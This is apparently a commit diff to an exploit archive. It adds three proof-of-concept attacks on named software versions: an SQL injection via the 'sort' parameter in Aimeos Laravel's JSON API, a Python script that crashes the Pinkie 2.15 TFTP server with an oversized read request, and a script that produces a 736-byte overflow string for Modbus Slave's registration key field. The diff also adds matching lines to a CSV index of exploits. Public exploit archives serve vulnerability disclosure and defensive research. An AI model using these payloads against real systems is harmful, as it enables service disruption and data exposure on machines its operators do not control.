DB: 2021-11-23
3 changes to exploits/shellcodes Pinkie 2.15 - TFTP Remote Buffer Overflow (PoC) Modbus Slave 7.3.1 - Buffer Overflow (DoS) Aimeos Laravel ecommerce platform 2021.10 LTS - 'sort' SQL injection
This commit is contained in:
parent
a4598bc3c4
commit
942d2d4f25
4 changed files with 97 additions and 0 deletions
26
exploits/php/webapps/50538.txt
Normal file
26
exploits/php/webapps/50538.txt
Normal file
|
@ -0,0 +1,26 @@
|
||||||
|
# Exploit Title: Aimeos Laravel ecommerce platform 2021.10 LTS - 'sort' SQL injection
|
||||||
|
# Date: 20/11/2021
|
||||||
|
# Exploit Author: Ilker Burak ADIYAMAN
|
||||||
|
# Vendor Homepage: https://aimeos.org
|
||||||
|
# Software Link: https://aimeos.org/laravel-ecommerce-package
|
||||||
|
# Version: Aimeos 2021.10 LTS
|
||||||
|
# Tested on: MacOSX
|
||||||
|
|
||||||
|
*Description:*
|
||||||
|
|
||||||
|
The Aimeos E-Commerce framework Laravel application is vulnerable to SQL injection via the 'sort' parameter on the json api.
|
||||||
|
|
||||||
|
==================== 1. SQLi ====================
|
||||||
|
|
||||||
|
https://127.0.0.1/default/jsonapi/review?sort=-ctime
|
||||||
|
|
||||||
|
The "sort" parameter is vulnerable to SQL injection, reveals table and column names.
|
||||||
|
|
||||||
|
step 1 : Copy json api GET request above.
|
||||||
|
step 2 : Change sort parameter value to --
|
||||||
|
|
||||||
|
----------------------------------------------------------------------
|
||||||
|
Parameter: sort (GET)
|
||||||
|
Type: error based
|
||||||
|
Title: GET parameter 'sort' appears to be injectable
|
||||||
|
Payload: sort=--
|
36
exploits/windows/dos/50535.py
Executable file
36
exploits/windows/dos/50535.py
Executable file
|
@ -0,0 +1,36 @@
|
||||||
|
# Exploit Title: Pinkie 2.15 - TFTP Remote Buffer Overflow (PoC)
|
||||||
|
# Discovered by: Yehia Elghaly
|
||||||
|
# Discovered Date: 2021-11-19
|
||||||
|
# Vendor Homepage: http://www.ipuptime.net/
|
||||||
|
# Software Link : http://ipuptime.net/PinkieSetup.zip
|
||||||
|
# Tested Version: 2.15
|
||||||
|
# Vulnerability Type: Buffer Overflow (DoS) Remote
|
||||||
|
# Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64
|
||||||
|
|
||||||
|
# Description: Pinkie 2.15 TFTP Remote Buffer Overflow
|
||||||
|
|
||||||
|
# Steps to reproduce:
|
||||||
|
# 1. - Download and install Pinkie 2.15
|
||||||
|
# 2. - Start TFTP Server listening on port 69
|
||||||
|
# 3. - Run the Script from remote PC/IP
|
||||||
|
# 4. - Crashed
|
||||||
|
|
||||||
|
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
|
||||||
|
import socket
|
||||||
|
|
||||||
|
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||||
|
|
||||||
|
read = (
|
||||||
|
#Request - read
|
||||||
|
b'\x00\x01' #Static - opcode
|
||||||
|
+ b')' * 32768 + #String - source_file (mutant, size=32768, orig val: b'File.bin')
|
||||||
|
b'\x00' #Delim - delim1
|
||||||
|
b'netascii' #String - transfer_mode
|
||||||
|
b'\x00' #Delim - delim2
|
||||||
|
)
|
||||||
|
sock.sendto(read, ('192.168.1.207', 69))
|
||||||
|
sock.recv(65535)
|
||||||
|
|
||||||
|
sock.close()
|
32
exploits/windows/dos/50536.py
Executable file
32
exploits/windows/dos/50536.py
Executable file
|
@ -0,0 +1,32 @@
|
||||||
|
# Exploit Title: Modbus Slave 7.3.1 - Buffer Overflow (DoS)
|
||||||
|
# Discovered by: Yehia Elghaly
|
||||||
|
# Discovered Date: 2021-11-19
|
||||||
|
# Vendor Homepage: https://www.modbustools.com/
|
||||||
|
# Software Link : https://www.modbustools.com/download/ModbusSlaveSetup32Bit.exe
|
||||||
|
# Tested Version: 7.3.1 < 7.4.2
|
||||||
|
# Vulnerability Type: Buffer Overflow (DoS) Local
|
||||||
|
# Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64
|
||||||
|
|
||||||
|
# Description: Modbus Slave 7.3.1 < 7.4.2 Buffer Overflow
|
||||||
|
|
||||||
|
# Steps to reproduce:
|
||||||
|
# 1. - Download and install Modbus Slave
|
||||||
|
# 2. - Run the python script and it will create modbus.txt file.
|
||||||
|
# 3. - Modbus Slave 7.3.1 < 7.4.2
|
||||||
|
# 4. - Connection -> Connect
|
||||||
|
# 5. - Paste the characters of txt file Registration Key
|
||||||
|
# 6. - press "ok" button
|
||||||
|
# 7. - Crashed
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
exploit = 'A' * 736
|
||||||
|
|
||||||
|
try:
|
||||||
|
file = open("Modbus.txt","w")
|
||||||
|
file.write(exploit)
|
||||||
|
file.close()
|
||||||
|
|
||||||
|
print("POC is created")
|
||||||
|
except:
|
||||||
|
print("POC not created")
|
|
@ -6806,6 +6806,8 @@ id,file,description,date,author,type,platform,port
|
||||||
50510,exploits/windows/dos/50510.py,"AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
|
50510,exploits/windows/dos/50510.py,"AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
|
||||||
50511,exploits/windows/dos/50511.py,"AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
|
50511,exploits/windows/dos/50511.py,"AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
|
||||||
50516,exploits/windows/dos/50516.py,"Xlight FTP 3.9.3.1 - Buffer Overflow (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
|
50516,exploits/windows/dos/50516.py,"Xlight FTP 3.9.3.1 - Buffer Overflow (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
|
||||||
|
50535,exploits/windows/dos/50535.py,"Pinkie 2.15 - TFTP Remote Buffer Overflow (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
|
||||||
|
50536,exploits/windows/dos/50536.py,"Modbus Slave 7.3.1 - Buffer Overflow (DoS)",1970-01-01,"Yehia Elghaly",dos,windows,
|
||||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux,
|
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux,
|
||||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris,
|
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris,
|
||||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux,
|
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux,
|
||||||
|
@ -44629,3 +44631,4 @@ id,file,description,date,author,type,platform,port
|
||||||
50531,exploits/php/webapps/50531.rb,"SuiteCRM 7.11.18 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",1970-01-01,"M. Cory Billington",webapps,php,
|
50531,exploits/php/webapps/50531.rb,"SuiteCRM 7.11.18 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",1970-01-01,"M. Cory Billington",webapps,php,
|
||||||
50532,exploits/ruby/webapps/50532.txt,"GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Jacob Baines",webapps,ruby,
|
50532,exploits/ruby/webapps/50532.txt,"GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Jacob Baines",webapps,ruby,
|
||||||
50533,exploits/php/webapps/50533.py,"Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload",1970-01-01,"Keyvan Hardani",webapps,php,
|
50533,exploits/php/webapps/50533.py,"Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload",1970-01-01,"Keyvan Hardani",webapps,php,
|
||||||
|
50538,exploits/php/webapps/50538.txt,"Aimeos Laravel ecommerce platform 2021.10 LTS - 'sort' SQL injection",1970-01-01,"Ilker Burak ADIYAMAN",webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue